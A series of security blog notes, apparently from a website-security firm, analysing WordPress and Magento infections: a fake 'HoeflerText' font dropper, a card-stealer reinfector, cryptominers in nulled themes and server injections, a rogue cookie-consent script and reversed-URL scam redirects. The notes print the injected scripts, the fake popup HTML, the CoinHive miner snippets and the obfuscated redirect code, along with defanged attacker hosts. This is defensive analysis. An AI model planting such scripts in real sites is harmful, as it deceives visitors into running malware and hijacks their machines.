Category: Website Malware Infections

Fake Font Dropper

A website owner reached out to us to investigate a weird behavior on their site. It was randomly showing a popup window for a missing font and telling the visitors that they are unable to view the content of the site because their own computers are missing a required font by the website called “HoeflerText”, as shown in this screenshot:


The malware tried to trick visitors to click on the “Update” button to download a malicious file called : Font_Update.exe

The code started with this at the top of the injected WordPress core file ./index.php and it’s checking for the browser type and version targeting, in this case, only Chrome browsers, as you can see in the below code:

   <script>    if (!!window.chrome && !!window.chrome.webstore) {         function FPGo() {            search = unescape('%2F%5B%5E%3C%3E%5C%5C%6E%5C%5C%73%5D%2F%69%67%6D');            pr = document.body.innerHTML;            result = pr.match(/>(w?s?.*?)</g);            result_arr = [];            for (var i = 0; i < result.length; i++) {                result_arr[i] = result[i].replace(eval(search), '&#0;')            }            for (var i = 0; i < result.length; i++) {                pr = pr.replace(result[i], result_arr[i])            }            document.body.innerHTML = pr        }        FPGo();    }</script>

The other regex and code is responsible for displaying the page incorrectly to the client. It looks damaged or corrupted to try to convince them that it’s all due to the missing font on their computers.

The other part of the malicious code was this one that’s responsible for showing the popup window and the alert to the visitors about this missing “HoeflerText” font on their computers:

   <div id="dm-table"><a href="javascript:void(0)" onclick="document.getElementById('dm-overlay').style.display = 'none'; setTimeout(dy0,1000);" id="cl0se"></a><img id="l0gos" alt='' />                    <p id="pphh">The "HoeflerText" font wasn't found.</p>                </div>                <div id="odiv9">                    <p id="info1">The web page you are trying to load is displayed incorrectly, as it uses the "HoeflerText" font. To fix the error and display the text, you have to update the "Chrome Font Pack".</p>                    <p id="info2" style="display:none;">Step 1: In the bottom left corner of the screen you'll see the download bar. <b id="bbb1">Click on the Font_Update.exe</b> item.<br id="brbr1" />Step 2: Press <b id="bbb1">Yes(Run)</b> in order to see the correct content on the web page.</p>                    <div id="divtabl">                        <table id="tabl1">                            <tbody id="tbody1">                                <tr id="trtr1">                                    <td id="tdtd1">Manufacturer:</td>                                    <td id="tdtd1">Google Inc. All Rights Reserved</td>                                </tr>                                <tr id="trtr1">                                    <td id="tdtd1">Current version:</td>                                    <td id="tdtd1">Chrome Font Pack <b id="bbb2">53.0.2785.89</b></td>                                </tr>                                <tr id="trtr1">                                    <td id="tdtd1">Latest version:</td>                                    <td id="tdtd1">Chrome Font Pack <b id="bbb2">57.2.5284.21</b></td>                                </tr>                            </tbody>                        </table>                        <div id="helpimg"><img id="inf0s" alt='' /></div>                    </div>                    <form action="https://another-hacked-website.com/avx/images/x86x.php" method="post" id="form_1d"><input type='hidden' name='infol' value='i+veHk+yCYMGJN0u3V+Nq1SdFdRlNVmXm+k+oC6hANGXowqEYpTQww==' /></form>                    <div id="upe0" onclick="ue0()"><a href="javascript:void(0)" id="b00tn">Update</a></div>                </div>            </div>        </div>    </div>    <div id="popup-container" class="popup-window gc" style="display:none;">        <div class="bigarrow element-animation"></div>

The hackers were storing the hxxps://Another-Hacked-site[.]dom/avx/images/x86x.php file on another hacked website.

Once the visitor clicks on the Update button to download the fix for the missing font, he or she will be redirected to a Dropbox URL that’s hosting the malicious Font_Update.exe file.

Conclusion: This incident is showing how important website security is to both website owners and visitors. It’s a huge responsibility on the website owners end to provide a malware-free website experience to their visitors, members, and customers while on eCommerce sites especially, to avoid infecting their computers and others devices with viruses or spyware that can cause data loss, or steal sensitive information (such as login or credit card info, and passwords) used on other websites for purchases and online banking. Spying on their actions and keylogging it or monitoring and managing their infected computers/smartphones remotely or using it to initiate and launch attacks (i.e: DDoS) plus many other possible malicious actions that can be done by an installed virus/malware on their computers, smartphones, or other devices.

Let us know if you see or suspect any weird behavior on your website and we will be happy to investigate and clean it for you.

Jun 14, 2018 by Moe Obaid

Magento CC stealer reinfector

We have seen many times in the past few months how attackers are infecting Magento installations to scrape confidential information such as credit cards, logins, and PayPal credentials, but we haven’t approached the methods that they use to ensure that their malicious code is added back, if removed.


Here’s a code we found on /includes/config.php. This is a prime candidate for infections once it is included right on the main index.php so that it loads at every page:

A default config.php file should not be changed by the site owner directly, all the code is added by Magento itself, seeing this code on the file already triggers a warning.

On the first block we have a function called “patch” that writes content into a file (patching it). This function is then called to write externally obtained content and write it into specific files related to the payment process or user control:

/app/code/core/Mage/Payment/Model/Method/Cc.php

/app/code/core/Mage/Payment/Model/Method/Abstract.php

/app/code/core/Mage/Customer/controllers/AccountController.php

/app/code/core/Mage/Customer/controllers/AddressController.php

/app/code/core/Mage/Admin/Model/Session.php

/app/code/core/Mage/Admin/Model/Config.php

/app/code/core/Mage/Checkout/Model/Type/Onepage.php

/app/code/core/Mage/Checkout/Model/Type/Abstract.php

The malicious code also obfuscates external links in a way that a simple variable replacement and base64 decoding can read it, but it makes less obvious for the untrained eye, such as:

$link_a = $link.'YTGgAnrv';

Convert to:

$link_a = 'hxxp://pastebin[.]com/raw/YTGgAnrv';&nbsp

It's not the first time that there’s malicious code being stored on pastebin which is then directly used by attackers to keep their infections more “low-profile” to make their detection harder.

Looking at all the content stored on pastebin[.]com, I found very common variations of malware that intend to steal passwords and credit card information then send them off to external domains for processing or sale such as:

hxxp://magento.ontools[.]net/update

hxxp://www.bgsvetlina[.[com/post.php

The code is pretty similar to other ones we previously approached:

https://labs.sucuri.net/?note=2016/12/13 0:00

https://labs.sucuri.net/?note=2016/11/03 0:00

https://labs.sucuri.net/?note=2016/05/25 0:00

Two interesting facts is the mechanism that the attackers add “error_reporting(0);” to avoid any error leading to the discovery of the infection and that the size of each of the files is verified to check if its necessary to reinfect them again.

As a rule of thumb on every Magento installation where a compromise is suspected to have taken place, the /includes/config.php should be verified straight on (I know I do it first thing). 

Removing just the infection that you have a main concern about many times does not suffice to clear your mind. You should always assume someone is out to get you and that they are still inside your website, so looking for other kinds of malware and backdoors is imperative.

For Magento infections like this, you can use our step-by-step guide on how to identify a hack and clean a compromised Magento site. Otherwise, feel free to get in touch and we’ll get you back to tip top shape in no time.

Jun 8, 2018 by Cesar Anjos

JQuory: Cryptomining in Nulled Themes and Plugins.

Three months ago b>@ninoseki revealed a group of sites with cryptomining scripts inside jquory.js files (yes, jquory instead of jquery).


The attack uses the “I2OG8vGGXjF7wMQgL37BhqG5aVPjcoQL” CoinHive key, takes up 70% of processor time, doesn’t mine on mobile devices and, for some reason, uses the didOptOut function despite the fact that it relies on the coinhive[.]com/lib/coinhive.min.js, which doesn’t involve any opt-out screens.

At the time, PublicWWW had indexed 458 such sites.

That Twitter thread speculated that nulled themes were to blame. Actually, it’s not only nulled themes; nulled WordPress plugins also come with this jquory cryptominer. Below, is what a typical injection in a nulled theme/plugin looks like:

function enqueue_my_scripts() {  wp_enqueue_script( 'wp-internal', 'https://coinhive[.]com/lib/coinhive.min.js', false, false, true );  wp_enqueue_script( 'wp-backend', plugins_url() . '/essential-grid/assets/js/jquory.js', false, false, true );}

As of the beginning of June 2018, we already see 1300 sites with this malicious assets/js/jquory.js script. The “I2OG8vGGXjF7wMQgL37BhqG5aVPjcoQL” site key is still valid and continues to mine Monero

Nulled software is long known for coming with an undisclosed malicious content such as backdoors, unwanted ads, web spam and now cryptominers. Please stay away from pirated themes and plugins if you care about security and reputation of your websites.

Jun 5, 2018 by Denis Sinegubko

Cookie consent script used to distribute malware

Since the new website cookie usage regulations in the EU have come into place, many websites have added a warning on their website about how they use cookies on it and as well, ask for your consent.


This has caused many website owners to look for an easy way to implement this and we recently found one website which was using JavaScript from cookiescript[.]info to display this cookie consent request on their website. When visiting the website for the first time via Chrome, you would get a JavaScript alert saying: “Your computer is infected. You have to check it with antivirus.”

You can try to click Cancel or OK but in both cases you are going to get redirected to a website trying to convince you to buy antivirus software which could be malware. It looks like the website cookiescript.info is the one distributing this malware to unsuspecting users.

The malware we caught, attempted to load JavaScript from here:
cdn.front.to/libs/cookieconsent.min.4.js

That link just redirects to this URL:
hxxp://cdn[.]cookiescript[.]info/libs/cookiescript.min.js

Here is some of the code inside this JavaScript:

As you can see, it’s loading some additional JavaScript; this time it's “hxxp://cdn[.]cookiescript[.]info/libs/detect_ga.js”, and is the one responsible for detecting the user agent, attaching the cookie to your browser. Here is some of the code:

Finally, this code gets loaded. It has the alert message, along with the code responsible for the redirect to the malicious website selling you the antivirus software:

hxxp://jsserver[.]info/alert.php

You can see the code here:

The website cookiescript.info appears to be using Cloudflare to hide its IP addresses, and the domain is protected by WhoisGuard, so there is no easy way to say who owns this website. However, after some more digging, I was able to find some more details.

cookiescript[.]info. 86399 IN NS fred.ns.cloudflare.com.
cookiescript[.]info. 86399 IN NS mia.ns.cloudflare.com.

It appears that cookie-consent.org and front.to are also part of the same network. We also found some evidence which suggests that the malware has been operating for a few months already.

We highly recommend inspecting code before adding it to your website. It's always best for you to host the entire code on your own server instead of an external website which can be compromised or simply be owned by malicious users.

May 29, 2018 by Krasimir Konov

Server-level Cryptominer Injections

During an investigation on a recent case, we came across a malware infection that came directly from the server.

Upon further inspection, we found that there were at least two servers showing the same symptom: cryptominers had been automatically injected into every web page after the</head> or </title> tag. The sites themselves had not been infected. The malware was coming from the web server itself, which modifies web pages on the fly. The servers we have identified so far are 5.196.91.117 and 104.243.40.34, with around 60 and 120 sites respectively.

This is the code being injected (line breaks added for readability):


<script src="hxxps://coinhive[.]com/lib/coinhive.min.js"></script><script>CoinHive.CONFIG.WEBSOCKET_SHARDS = [["ws://176.10.104 .249:8892"]];var miner = CoinHive.Anonymous('49MvxieMYbGSbamYfv2ajQ52KqGATcGttPNhPCb4TXj3B2FimiUav7nF3hSWioTqujByt2cVietKNVwCkVRGX2qpC58N79b');</script>

It's a modification of the common CoinHive miner that uses an alternative proxy (176.10.104.249:8892) and mines directly to this Monero address 49MvxieMYbGSbamYfv2ajQ52KqGATcGttPNhPCb4TXj3B2FimiUav7nF3hSWioTqujByt2cVietKNVwCkVRGX2qpC58N79b.

Any webmasters with websites hosted on either of these servers are recommended to check with their hosting provider to resolve the issue.

Jan 22, 2018 by Cesar Anjos

Naive CoinHive Injections

Since CoinHive domain made it into many blacklists, attackers began avoiding linking to the hosted library file https://coinhive .com/lib/coinhive.min.js. Instead, they uploaded this file to third-party sites. Some of the attempts to get rid of the coinhive.com domain look pretty naive. For example, injecting the whole library code into web pages.


Yes! Some attackers inject all 60+ kilobytes of the CoinHive library into the HTML code of infected web pages. It is hard to miss when you visually inspect code of such pages. It was funny to find that in one case the attackers tried to renamed the miner variable into animation to make the code look more acceptable.

On another site, the library was injected into a web page in an obfuscated format that made it even bigger. Again, the attackers went an extra mile to make it look less suspicious. They added this comment

<!--<script src="https://authedmine.com/lib/authedmine.min.js"></script>-->

Authedmine.com - is a version of the CoinHive JavaScript miner that always asks permission to start mining thus considered an acceptable use of a Monero miner on a website. However in the above case, the obfuscated code was not from authedmine - it was the silent coinhive.com version. No wonder the site begins mining coins full speed without any notifications as soon as you open it.

And by the way, when you copy all the CoinHive library code (even obfuscated) to a third-party site it still makes requests to CoinHive domains, so it's easy to detect and block.

For articles about more sophisticated “cryptojacking” hacks please check our blog.

If your site is a victim of such attacks, we can help to clean and protect it.

Dec 20, 2017 by Denis Sinegubko

Reversed URLs Randomly Redirect to Scams

We are seeing hundreds of infected WordPress sites with the following scripts (in one line) injected in random places in wp_posts table.


$vTB$I_919AeEAw2z$KX=function(n){if (typeof ($vTB$I_919AeEAw2z$KX.list[n]) == "string") return $vTB$I_919AeEAw2z$KX.list[n].split("").reverse().join("");return $vTB$I_919AeEAw2z$KX.list[n];};$vTB$I_919AeEAw2z$KX.list=["'php.nosj.ssalc/cni/xobloot-yendys/snigulp/tnetnoc-pw/moc.itnetaitak.www/​/:ptth'=ferh.​noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1=​=3){var delay = 15000;setTimeout(​$vTB$I_919AeEAw2z$KX(0), delay);}

This code randomly (with probability of around 20%), after a timeout of 15 seconds, redirects visitors various scam sites (e.g. “Browser review to win an iPad” or “tech support” scams).

The redirect chains usually include domains like3cal1ingc0nstant3111212[.]tk, 3worthysupp0rt310121[.]tk, techsupport60512123456[.]tk, 2bestsupp0rt310121[.]tk, etc. (they change frequently)and balans.shahterworld[.]org

The very first redirect URL is hard-coded in the reversed form (we see this obfuscation trick quite often) inside the injected scripts. In the above case the redirect code decodes to this

document.location​.href='hxxp://www.katiatenti[.]com/wp-content/plugins/sydney-toolbox/inc/class.json.php'

It’s is not the only redirect URL used in this campaign. We checked over 200 infected sites and found these 4 URLs – all of them on hacked sites themselves.

hxxp://emarketing-immobilier[.]com/wp-content/plugins/gotmls/safe-load/plugin-settings.phphxxp://www.katiatenti[.]com/wp-content/plugins/sydney-toolbox/inc/class.json.phphxxp://kodmax[.]com/wp-content/plugins/twitter-widget-pro/lib/class.widget.phphxxp://nh70putera[.]com/wp-content/plugins/login-lockdown/plugin-settings.php

As always, if you need a professional help to clean and protect your site, you can count on us.

Dec 14, 2017 by Denis Sinegubko